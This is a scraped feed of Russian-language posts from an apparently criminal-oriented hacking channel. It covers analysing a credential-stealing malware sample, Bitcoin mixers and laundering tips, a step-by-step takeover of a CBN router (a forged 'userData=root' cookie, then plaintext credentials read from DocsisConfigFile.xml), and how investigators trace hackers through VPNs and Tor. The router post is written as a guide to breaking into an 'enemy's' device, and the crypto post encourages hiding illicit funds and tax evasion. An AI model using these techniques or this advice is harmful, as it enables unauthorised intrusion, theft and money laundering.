  <p>Привет, юный блэкхэт, в этой статье мы рассмотрим такую под-сферу в хакинге, как анализ малвари. </p>
  <p>В этой статье ты узнаешь:</p>
  <ul>
    <li>Как перехватить траффик вируса, и проанализировать его</li>
    <li>Как проанализировать систему на изменения.</li>
    <li>Как изучить код малвари. Реверс инжиниринг.</li>
  </ul>
  <figure class="m_original">
    <img src="https://teletype.in/files/3c/3c04c907-8ed7-4ed9-94aa-74cb0ef3dc58.png" width="1200" />
  </figure>
  <h3>Анализ трафика.</h3>
  <p>Пожалуй, одно и самых нужных вещей, при анализе вируса. И так, для анализа исходящего траффика используется специальные программы - снифферы. Наиболее популярные из них:</p>
  <ul>
    <li><a href="https://www.wireshark.org/download.html" target="_blank">WireShark</a></li>
    <li><a href="https://www.telerik.com/fiddler" target="_blank">Fiddler</a></li>
    <li><a href="https://portswigger.net/burp" target="_blank">Burp Suite</a></li>
  </ul>
  <p>Рассмотрим, что мы сможем узнать о вирусе, по его запросам.</p>
  <p>Открываем наш сниффер, в моём случае это Fiddler:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/fb/fb0bbd20-2f4f-4391-9e3c-1aade974e604.png" width="1366" />
    <figcaption>Интерфейс программы.</figcaption>
  </figure>
  <p>Запускаем вирус, затем смотрим, какие запросы были отправлены:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/db/db44c3c2-e155-40e9-964a-34666f5b27d1.png" width="1356" />
  </figure>
  <p>Проанализируем их. Первый запрос полетел на этот сайт: <a href="http://ip.42.pl/raw" target="_blank">http://ip.42.pl/raw</a></p>
  <p>При переходе на него покажется ваш внешний IP, малварь использует этот сайт что-бы спарсить ваш ИПшник.</p>
  <p>Второй запрос отправился на домен, при переходе на него было показано следующее:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/0f/0f1deb50-9b54-4a8a-880b-38bb1da2526f.png" width="973" />
  </figure>
  <p>Все эти цифры нужны для парса функций софта. Приведу пример. Когда софт сделал запрос, и скопировал цифры, происходит проверка: Если первая цифра == 1, то софту нужно украсть логи;пароли, как пример в псевдокоде, но думаю, ты понял. </p>
  <p>Когда вы получили домен панели, можно так-же и провести анализ самой панели на уязвимости, накидать брут, спиздить логи. Для малварь-хантеров панель очень важная зацепка, т.к если панель стоит на не-абузоустойчевом хостинге, они могут отправить запрос к администрации, с просьбой предоставить всю инфу о владельце этого домена. Ну а там по <a href="https://teletype.in/@exploit_dar/H1t8teCvB" target="_blank">нарастающей..</a></p>
  <p></p>
  <p>Конечно, разработчики малвари должны понимать, что рано или поздно, его детище начнут изучать, но если ты думал, что от анализа трафика нет защиты, ты крупно ошибаешься. Я например в своём софте сделал Анти-Анализ, и в одном из методов просто проверял запущенные процессы, и если среди них был процесс снифера, софт самоуничтожался, как то так.</p>
  <p></p>
  <h3>Поведение системы.</h3>
  <p>Чтобы отследить создание файлов, папок, операции с регистром, чаще всего используется программа <em>Process Monitor</em></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/6a/6a384f4b-b49a-45e2-9874-354bce7c7a59.png" width="1363" />
    <figcaption>Интерфейс программы</figcaption>
  </figure>
  <p>Но прежде чем начать анализировать систему следует настроить фильтры.</p>
  <p>Заходим во вкладку &quot;Filter =&gt; Filter...&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/01/01d980e0-61b8-4885-ac37-776affa3e6d4.png" width="819" />
  </figure>
  <p>Добавляем нужный фильтр - Process Name, begins with, имя_процесса, Include:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/e2/e2d598f8-1a91-456b-ad60-35f43d4d66a9.png" width="815" />
    <figcaption>вместо who - имя вашего процесса.</figcaption>
  </figure>
  <p>Так-же добавляем фильтр на папку Windows, это нужно для того, чтобы когда малварь обращается к какой-либо DLL&#x27;ке, у нас не было лишних записей.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/9b/9b8a72c7-8642-4070-9d9b-5f7e573a0f66.png" width="812" />
  </figure>
  <p>Теперь в главном окне выбираем, что отслеживать: Активность регистра, Файловую систему, Сетевой траффик, Потоки</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/59/59941340-70d6-45b0-ba15-1b801deb7c6c.png" width="427" />
  </figure>
  <p>Теперь всё готово, запустим анализ системы сочетанием клавиш: CTRL + E.</p>
  <p>Далее запускаем наш вирус и смотрим вывод,</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/09/09112b48-b79e-4307-86a2-0c833aef9b4a.png" width="336" />
  </figure>
  <p>Проанализируем некоторые действия. Первым, что делает софт, это создаёт папку в Temp директории с именем пользователя и скрывает её:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/30/309cf2c0-9e35-4a56-a6d7-f7340cc45d9b.png" width="477" />
    <figcaption>Создание</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/83/83121bba-713b-480a-99dd-8f51b4050074.png" width="422" />
    <figcaption>Скрытие</figcaption>
  </figure>
  <p>Затем получает пути до БД файлов хромиум браузеров - Login Data, в которых содержаться логины и пароли, так-же копирует этот файл в временную директорию</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/50/50ebb55e-b737-47a4-8e1d-723bc9ca4716.png" width="481" />
  </figure>
  <p>После этого вытаскивает из всех БД пароли, куки, историю браузера и записывает по файлам</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/59/59ea0602-9094-4e4e-9389-56f9e94fa51f.png" width="474" />
  </figure>
  <p>Ну и дальше, он действует так-же как и другие вирусы подобного типа, собирает файлы с рабочега стола, стима, телеграма. Потом архивирует папку и отправляет на домен, что был при анализе траффика. </p>
  <figure class="m_original">
    <img src="https://teletype.in/files/e9/e9579477-26b8-423b-bd95-4a07a9b430b8.png" width="587" />
  </figure>
  <p>На этом с анализом системы, и созданных файлов закончим, перейдём к следующему пункту.</p>
  <p></p>
  <h3>Реверс-инжиниринг.</h3>
  <p><a href="https://teletype.in/@exploit_dar/ry4IzlKWB" target="_blank">(Статья про реверс Python приложений)</a></p>
  <blockquote>Реверс инжиниринг — исследование некоторого готового устройства или программы, а также документации на него с целью понять принцип его работы; например, чтобы обнаружить недокументированные возможности (в том числе программные закладки), сделать изменение или воспроизвести устройство, программу или иной объект с аналогичными функциями, но без прямого копирования. </blockquote>
  <p><em>Реверсинг сродни крэкерству, однако под реверсингом чаще понимается восстановление исходного кода программы из исполняемого кода, часто реверсинг кода может быть даже не связан с алгоритмом защиты программ.</em></p>
  <p>В этой статье я лишь задену самые основы реверса .Net приложений</p>
  <p><strong>Инструментарий.</strong></p>
  <p>Для реверса нам необходимы программы: </p>
  <ol>
    <li>ExeInfoPE / RDG Packer Detector</li>
    <li>dnSpy</li>
  </ol>
  <p><a href="http://exeinfo.atwebpages.com/" target="_blank"><strong>ExeInfoPE</strong></a> и <strong>RDG Packer Detector </strong>выполняют одну (из) важную функцию для реверса - Узнать ЯП на котором написана программа.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/a1/a1d9c539-d5dd-42ac-a3ae-c6a12c8de602.png" width="523" />
  </figure>
  <p><a href="https://github.com/0xd4d/dnSpy/releases" target="_blank"><strong>dnSpy</strong></a> - Инструмент для дизассемблирования, говоря простым языком эта утилита позволит нам доставать весь код из exe файла.</p>
  <p><em>DnSpy включает в себя декомпилятор, отладчик и редактор сборки. Он может быть легко расширен путем написания собственного расширения.</em></p>
  <p></p>
  <p>Перейдём ближе к делу, отрываем dnSpy, и перекидываем туда наш файл</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/17/17a7975c-3e67-4aaf-93aa-578f0632c92f.png" width="1287" />
  </figure>
  <p>И если результат оказался примерно таким, то тебе повезло вирус не обфусцирован. </p>
  <blockquote>Обфускация - приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции</blockquote>
  <figure class="m_original">
    <img src="https://teletype.in/files/f9/f9962454-1a4c-4554-95b2-bb0691c9f61c.png" width="536" />
  </figure>
  <p>Ну и вызовы методов</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/68/685d9def-de41-462d-8a5d-59578a0b02b5.png" width="172" />
  </figure>
  <p></p>
  <p></p>
  <p><strong>Заключение.</strong></p>
  <p>Вот и всё, в этой статье мы лишь поверхностно затронули такую тему, как анализ вредоносных программ. Если тебя заинтересовала эта тема, то для начала советую выучить хотя бы пару языков программирования, что бы после понимать, что происходит в коде. Затем освоить реверс, попрактиковаться с деобфускацией, поработать с IDA Pro. На этом всё,</p>
  <p>На этом всё, канал DARK $IDE, админ 3XPL01T.</p>
  <p></p>
  <p>D$ 2.0</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/BJJtnUxYS</guid><link>https://teletype.in/@exploit_dar/BJJtnUxYS?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/BJJtnUxYS?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Насколько анонимен Bitcoin. Или как вывести средства подальше от потусторонних глаз.</title><pubDate>Sun, 13 Oct 2019 08:12:38 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/14/14fc3536-4f9a-488b-af20-147a7f07a4be.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/4c/4c31d730-78ef-47e3-88ec-5bf0b2768131.png"></img>Привет, скрипт-кидди-брат, в этой статье ты узнаешь:]]></description><content:encoded><![CDATA[
  <p>Привет, скрипт-кидди-брат, в этой статье ты узнаешь:</p>
  <ul>
    <li>Насколько анонимен биткоин?</li>
    <li>Какие криптовалюты являются более анонимными.</li>
    <li>Как отслеживают подозрительные транзакции.</li>
    <li>И всё таки, как быть более анонимным используя именно эту криптовалюту.</li>
  </ul>
  <p>Усаживайся поудобнее, <s>маски-</s>шоу начинается!</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/4c/4c31d730-78ef-47e3-88ec-5bf0b2768131.png" width="1264" />
  </figure>
  <p><strong>Миф №1. Анонимность биткоина..</strong></p>
  <p>Давай вспомним, по какой причине люди считают биток анонимной криптой.</p>
  <p>Отличие от простых банковских/электронных транзакций, криптовалютные переводы не нуждаются в приличном объёме информации о тебе, например такой как: ФИО, номер телефона, паспортных данных, etc. </p>
  <p>Также криптовалютные платежи не привязываются к конкретному лицу.</p>
  <blockquote>Переводы в системе проверяются случайно выбранными узлами связи, связанными между собой посредством IP-адресов. Для узлов связи остается неизвестным какой из узлов связи создал транзакцию, а какой только перенаправил ее.</blockquote>
  <p>Да, биткоин действительно не собирает о тебе тонну личной информации, но разве это может сделать тебя действительно анонимным? Нет.</p>
  <p>Биток как минимум не скрывает данные о твоих транзакциях. Откуда и кому прилетели заветные монетки, дата в твоём часовом поясе, всё это находится в открытом доступе. АнОнИмНоСтЬ?</p>
  <p></p>
  <p><strong>Какие криптовалюты являются более анонимными?</strong></p>
  <p>Не смотря на мейнстрим битка в последнее время, шарящие люди пользуются другими криптовалютами. Какими? - Давай расскажу тебе вкратце.</p>
  <ul>
    <li><strong>Monero</strong>. Анонимная криптовалюта, в которой информация в блокчейн реестр добавляется в искаженном виде, что существенно усложняет отслеживание пользователей.</li>
    <li><strong>Dash</strong>. Анонимность в системе достигается за счет смешивания монет пользователей. Анонимная транзакция не идет напрямую к пользователю, в начале она направляется в мастерноду, где транзакции “дробятся” на мелкие части и перемешиваются между собой в несколько этапов, после чего формируются в новые транзакции и отправляются получателям. Таким образом, связь между отправителем и получателем разрывается.</li>
    <li><strong>Zcash</strong>. Конфиденциальность пользователя в системе достигается благодаря применению протокола нулевого разглашения. Он работает по принципу: чтобы проверить транзакцию, достаточно подтвердить факт ее существования, но не нужно знать адреса получателя и отправителя.</li>
  </ul>
  <p>Из всего выше перечисленного, лично я бы рекомендовал пользоваться Dash&#x27;ом.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/8f/8f98af27-5910-48d1-a225-167f792bd1e7.png" width="1480" />
  </figure>
  <p><strong>Как отслеживают подозрительные транзакции и устанавливают личность хозяина Bitcoin-кошелька.</strong></p>
  <p>Большинство людей использующих криптовалюту, чтобы их личность установили, у каждого есть на это свои причины.</p>
  <blockquote>Перестань думать, что криптовалютой пользуются только для покупки шишек на трёхголовой, или для покупки оружия, хакерских услуг, и так далее. На самом деле с криптовалютой отмывают столько денег добытых не совсем честным способом, что голова просто разрывается от количества нулей на чужом счёте. Ещё как вариант, у меня были знакомые, которые избегали налогов используя крипту. Как? Пусть останется новой тайной этого канала..</blockquote>
  <p>Как привяжут личность к кошельку биткоин.</p>
  <p><em>Допустим, некто совершил покупку в онлайн магазине и рассчитался биткоином. На сайте продавца потребовалось указать ФИО и адрес доставки. С этого момента адрес покупателя нельзя назвать анонимным, поскольку произошла привязка к личным данным и теоретически на основе этих данных уже может быть доказана причастность владельца адреса ко всем предыдущим и последующим транзакциям.</em></p>
  <p></p>
  <p><strong>Как остаться в тени?</strong></p>
  <ul>
    <li>Сокрытие IP-адреса. Существует вероятность, что IP-адрес, с которым связана транзакция, может быть отслежен, поэтому при проведении операций с криптовалютами рекомендуется использовать TOR и другие сервисы для сокрытия адреса.</li>
    <li>Новый адрес для каждой транзакции. Использования разных адресов для входящих и исходящих транзакций существенно усложняет идентификацию личности и делает невозможным подсчет точного количества монет на кошельках пользователя. В большинстве кошельков эта новый адрес генерируется автоматически для каждой транзакции.</li>
    <li>Большие транзакции. Рекомендуется избегать крупных транзакций, ведь именно они в первую очередь привлекают внимание контролирующих органов и злоумышленников. При необходимости совершить крупный платеж рекомендуется разделить сумму перевода на несколько отдельных, не слишком существенных транзакций и провести пересылку с разных адресов.</li>
    <li>Биткоин-миксеры. Существуют специальные сервисы, позволяющие перемешивать монеты и усложнять их отслеживание. С их помощью пользователь может отправить энное количество монет, которые будут смешаны с монетами других пользователей и в итоге на счет поступят уже новые монеты, не связанные с предыдущими транзакциями.</li>
  </ul>
  <p></p>
  <p>Самыми эффективной связкой является: Использование TOR&#x27;a + Новый адрес + Биткоин миксеры + Обменники (но тут уже по желанию).</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/cd/cd362106-b096-4000-9705-8ab94341cc8e.png" width="1000" />
  </figure>
  <p><strong>Миксеры. Что это и с чем едят.</strong></p>
  <p>Чтобы понять, что такое Биткоин Миксер, я просто расскажу тебе принцип его работы:</p>
  <p>Cайт принимает криптовалюту множества человек, затем использует алгоритмы для смешивания и отправляет биткоины по разным кошелькам. Поскольку транзакции перемешиваются, миксуются, у подобного сервиса появилась такое название — миксер криптовалют.</p>
  <p>Как только микширование будет завершено, монеты будут отправлены обратно с вычетом комиссии за обслуживание. Эта плата, как правило, зависит от нескольких факторов, в том числе количество смешиваний, а также количество отправленных монет.</p>
  <p>Если тумблер справился успешно, то монеты не могут быть связаны с вами. </p>
  <p>Подробнее можно почитать тут: <strong><a href="https://crypto-fox.ru/faq/mikser-kriptovalyut/" target="_blank">Биткоин-миксер: лучший способ сохранить анонимность криптовалюты</a></strong></p>
  <p></p>
  <p></p>
  <p><strong>Заключение</strong>.</p>
  <p>Как оказалось, биткоин не является анонимной криптой, хотя сколько споров было на этот счёт.</p>
  <p>Надеюсь, что это статья была тебе полезна, на этом всё, удачи.. и оставайся анонимным...</p>
  <p></p>
  <p><em>//D$ LTD//</em></p>
  <p></p>
  <h2><a href="https://t.me/joinchat/AAAAAFNPU7FoCp8mcBr4xg" target="_blank">Dark $ide -- Твоя тёмная сторона.</a></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/ryphv5pdr</guid><link>https://teletype.in/@exploit_dar/ryphv5pdr?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/ryphv5pdr?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Взлом роутера. Анализ + эксплоиты.</title><pubDate>Fri, 11 Oct 2019 05:48:37 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/cd/cde3836f-b943-49b1-8211-6c59df5086d7.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/79/79a7e755-24db-4922-b953-25af0d4c73cd.png"></img>Привет, %script-kidd-name%, сегодня поговорим о том, как взломать роутер твоего неприятеля. Усаживайся поудобней, мы начинаем!]]></description><content:encoded><![CDATA[
  <p>Привет, %script-kidd-name%, сегодня поговорим о том, как взломать роутер твоего неприятеля. Усаживайся поудобней, мы начинаем!</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/79/79a7e755-24db-4922-b953-25af0d4c73cd.png" />
  </figure>
  <p>Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh. </p>
  <p>В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да?</p>
  <p></p>
  <blockquote>Для этой статьи я собираюсь использовать роутер CBN CH6640E. Если хорошенько погуглить, ты поймёшь, что он не из самых новы, поскольку был выпущен в 2011 году, а также есть целый пост в exploit-db.com об этом говорит многое).</blockquote>
  <p></p>
  <p>Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей.</p>
  <p>Ну ладно, теперь к делу.</p>
  <p></p>
  <h3><strong>ЭТАП I. НАЙДИ IP РОУТЕРА.</strong></h3>
  <p>Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей: </p>
  <ul>
    <li>Проверка сетевых настроек с помощью панелей настроек ОС </li>
    <li>Использование <em>ipconfig </em>в Windows и <em>ifconfig </em>на машинах Unix из терминала </li>
    <li>Использование Fuzzer в качестве инструмента обнаружения цели. </li>
  </ul>
  <p>Найденный мной IP роутера - <code>192.168.0.1</code></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/c3/c3c8bbc4-c9df-4a51-baea-304d995d9ed9.png" width="1790" />
  </figure>
  <p></p>
  <h3>ЭТАП II. СОБЕРИ ТРАФФИК.</h3>
  <p>Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/9c/9cf9438d-331b-4291-8bc8-8706309e99cf.png" width="1071" />
    <figcaption>Этой информации нам хватит.</figcaption>
  </figure>
  <p></p>
  <h3>ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ.</h3>
  <p>Теперь, когда у нас есть нужное колчиство данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ.</p>
  <p>Есть этот интересная штука, которую я нашел в <code>/menu.html </code></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/4b/4bc24716-a0e5-4d05-9bcc-56420c316ab3.png" width="1071" />
    <figcaption>Присмотрись хорошенько.</figcaption>
  </figure>
  <p>Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie. </p>
  <p>Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри..</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/91/9106bfdc-31a7-4288-b6a2-e78150886a6e.png" width="1790" />
    <figcaption>Всё так просто?</figcaption>
  </figure>
  <p></p>
  <h3>ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT&#x27;ОВ.</h3>
  <p>Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему. </p>
  <p>Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе.</p>
  <p>Для этого я буду использовать сканер с уже установленным файлом cookie <em>userData=root</em>. В addiotion я включу опцию &quot;направленное сканирование&quot; на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/2d/2d6f4be0-e527-4fe9-b67a-e1ac14a9de7c.png" width="1138" />
  </figure>
  <p></p>
  <p>После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например <em>/basicSetup.html</em> и / или <em>basicDHCP.html</em> и пусть инструмент делает свою работу. </p>
  <p>После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/02/02edc7bd-605b-44d5-a3bf-64292adc50b0.png" width="1077" />
  </figure>
  <p></p>
  <h3>ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ.</h3>
  <p>DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/60/602ee247-1012-4c07-b312-5d064b306d45.png" width="1790" />
    <figcaption>Да, всё так просто.</figcaption>
  </figure>
  <p></p>
  <p>Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ.</p>
  <p></p>
  <p><strong>Заключение</strong>.</p>
  <p>Как видишь, даже каких-либо 0day экплоитов нам не понадобилось, чтобы получить полный контроль над роутером..</p>
  <p>Ну а с какой целью взламывать роутеры, я расскажу чуть позже, если эта статья тебе понравится, понимаешь о чём я?)</p>
  <p></p>
  <p><em>//D$ LTD//</em></p>
  <p></p>
  <h2><a href="https://t.me/joinchat/AAAAAFNPU7FoCp8mcBr4xg" target="_blank">Dark $ide -- Твоя тёмная сторона.</a></h2>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/H1t8teCvB</guid><link>https://teletype.in/@exploit_dar/H1t8teCvB?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/H1t8teCvB?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Охота на хакеров, как тебя найдут спец.службы</title><pubDate>Sun, 29 Sep 2019 09:28:48 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/60/6036681a-a0cb-4c86-8680-e7b808efba38.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/5d/5d3ad85f-05cd-4792-8926-3b6621f1c06e.png"></img>Wazzz up, похакеры, сегодня расскажу вам, как серьёзные дяди ловят таких как мы (ахахаха, на самом деле нет, ты им пока-что нахуй не нужен, но это пока)) тру хакеров. ]]></description><content:encoded><![CDATA[
  <p>Wazzz up, похакеры, сегодня расскажу вам, как серьёзные дяди ловят таких как мы <em>(ахахаха, на самом деле нет, ты им пока-что нахуй не нужен, но это пока)) </em>тру хакеров. </p>
  <figure class="m_original">
    <img src="https://teletype.in/files/5d/5d3ad85f-05cd-4792-8926-3b6621f1c06e.png" />
  </figure>
  <p>- Так с чего же мы начнём? </p>
  <p>- Давай с выдуманной истории. </p>
  <p>Представим, существует хацкер Вася. Вася любит воровать кэш у наших друзей из-за бугра. Вася пиздит важные документы с ООО &quot;Рога и Копыта&quot;, распространяет малварь в неебическом размере, держит свой ботнет.</p>
  <p>Короче говоря - Вася тру. Казалось бы, Вася не дурак, использует все средства анонимности: ВПН, ТОР, левый ноут, ТруКрипт, все дела. Но давай разберёмся, насколько наш Вася анонимен, и как его смогут найти серьёзные дядьки..</p>
  <p></p>
  <h3>VPN.</h3>
  <figure class="m_original">
    <img src="https://teletype.in/files/66/66a3d07b-b479-4f3b-b7b6-240a2a854147.png" width="500" />
  </figure>
  <p>Вспомним нашего хакера, Вася намутил себе ВПН в каком-нибудь Берлине, захотелось ему нагадить компании &quot;Рога и Копыта&quot;, И вот, разослав последнее фишинговое письмо, Васе удалось украсть всё, что представляло ему интерес. Что происходит дальше?  Директор компании обращается к ребятам в погонах, они, с помощью <strong>с</strong>истемы <strong>о</strong>перативно <strong>р</strong>озыскных <strong>м</strong>ероприятий, дают запрос провайдерам России-матушки, как стационарным, так и мобильных операторов. Спрашивают, кто подключался к такому-то IP адресу Берлина, ведь они видели лишь IP Берлина, но не видели IP-шник Васи. Наш интернет провайдер посмотрит по логам и естественно сдаст нас, что мы подключались к этому IP адресу. Всё. Васе пизда, не смотря на то, что ВПН был &quot;приватным&quot;/&quot;не сливающим&quot;/&quot;личным&quot;.</p>
  <p>Ну ладно, не может же быть Вася настолько глупым, он использует не один ВПН сервер, а связку. </p>
  <p>Так вот, представим новую связку. Вася из Залупинска подключается в Амстердам, затем к Берлину. А потом заходит на ресурс и вновь совершает противозаконные действия. </p>
  <p>Начало развития событий одинаковы - опять обращаются к ребятам в погонах, опять система оперативно розыскных мероприятий. <em>Что они будут искать?</em> Они ищут на выходе наш Берлиновский IP. Дают запрос провайдерам РФ - кто подключался к нему? А никто не подключался. Почему? Потому что наш провайдер видит только подключение к Амстердаму, но не видит подключения к Берлину. А пострадавший видит лишь подключение из Амсердама.</p>
  <p>Казалось бы, вот она - АНОНИМНОСТЬ, которую так желал наш хакер. Но не спеши с выводами, мой друг. Всё не совсем так безопасно, давай разбираться. </p>
  <p>На самом деле всё очень просто - любой айпи принадлежит провайдеру, а он ведет логи и видит кто к кому подключался. Связываются с провайдером IP Амстердама, узнают кто арендует сервер, дают запрос арендатору и он сдает с потрахами кто к нему в это время подключался и точно так же потом идут к следующему серверу и на выходе получают ваш IP. ЭТО ЛИШЬ ДЕЛО ВРЕМЕНИ.</p>
  <p>Так-что если ты думал, что подрубив дабл-впн ты станешь анонимным, можешь начать параноить, ведь если ты натворил дел, суши сухари.</p>
  <p></p>
  <p>Теперь разрушу миф о &quot;не сливающих&quot; серверах. (Слова не мои, нашёл в тырнетах)</p>
  <blockquote>Бытует мнение что можно взять VPN в Панаме, Катаре и все будет хорошо. </blockquote>
  <blockquote>Это только отчасти так. Почему? Потому что официальными запросами добиться можно все. </blockquote>
  <blockquote>Рассмотрим как работают спецслужбы с той же самой Панамой. Панама не выдает никому никогда никакие данные, НО кроме спецслужб США :) </blockquote>
  <blockquote>Соответственно, спецслужбы РФ дают запрос в Интерпол, указывают IP адрес и указывают причастность к терроризму. Интерпол передает этот запрос к спецслужбам США, а те соотвественно в Панаму. И точно так же ответ идет обратно. </blockquote>
  <blockquote>Та же схема работает и с Катаром, за исключением что они дают запрос в Саудовскую Аравию. </blockquote>
  <blockquote>В любом случае нас найдут, если захотят. </blockquote>
  <blockquote>Но мы не прячемся от спецслужб, верно же? :) </blockquote>
  <blockquote>Мы лишь рассматривает спецслужбы как эталон в деанонимизиции. </blockquote>
  <p></p>
  <h2>TOR.</h2>
  <p>Ладно, не все же хакеры довольствуются одним впн-ом, есть же тор, с которым всё станет максимально безопасно.... или нет?</p>
  <p>И вот немного другая ситуация, Вася хочет проверить свой ботнет, который хостится на абузоустойчевом сервере...</p>
  <p>Стоп-стоп, погоди, давай-ка на момент вспомним, как работает ТОР, вкратце. Когда ты, дыркнетчик, мамин нетсталкер, заходишь в даркнет, на .onion сайты - то все пучком, трафик находится в зашифрованной сети и мы находимся в безопасности.</p>
  <p>Но что будет если мы с тора зайдём в клирнет?</p>
  <p>А если мы хотим зайти в http то есть в сеть интернет, с браузера тор, то наш трафик автоматически расшифровывается через выходной узел (далее это будет называться нода), потому что сеть интернет не может читать трафик тора и для этого созданы выходные узлы, которые “конвертируют” трафик тора в трафик интернет.</p>
  <p>И тем самым мы просматриваем уже http сайты с тора, но тут есть опасность. Стать владельцем Выходного узла может каждый, в том числе и спец службы.</p>
  <p></p>
  <p>Как там ботнет? Всё бы неплохо, но блять, Вася совсем забыл, что собственную ноду поднять дело нескольких десятков минут, вместо этого он лучше позалипает на свои доходы, и будет рад тому. Человеческий фактор.</p>
  <blockquote> Лень + Чувство неуязвимости . Эта простая связка человеческих факторов губит таких как мы.</blockquote>
  <p>И вот, малварь-хантеры при анализе ботнета Васи, обнаружили, что ботя подключается к IP сервера, на котором стоит админ-панель, далее всё по аналогии, как и с ВПНом, дают запрос к администрации сервера, ну а дальше вы уже сами знаете.</p>
  <p>Ну а если Василий всё таки параноик и подрубил свою ноду?</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/ed/ed995478-62c8-408d-adc8-77508311ac2b.png" width="1004" />
    <figcaption>Сюрприз..</figcaption>
  </figure>
  <p>Спешу сразу же тебя огорчить, перехватить трафик через ноду вполне возможно, не буду рассказывать как это сделать, но если тебе так интересно, почитай, будет полезно: </p>
  <p><a href="https://habr.com/ru/company/xakep/blog/244485/" target="_blank"><strong>Снифаем выходную ноду Tor’а и анализируем получившийся контент.</strong></a></p>
  <h3></h3>
  <h3>TrueCrypt / VeraCrypt / etc..</h3>
  <figure class="m_original">
    <img src="https://teletype.in/files/ec/ec768eb5-256e-482c-b470-c069727103a9.png" width="406" />
  </figure>
  <p>Ну тут тоже всё довольно просто: подбор пароля, при котором будет использовано все твои данные с ПК.</p>
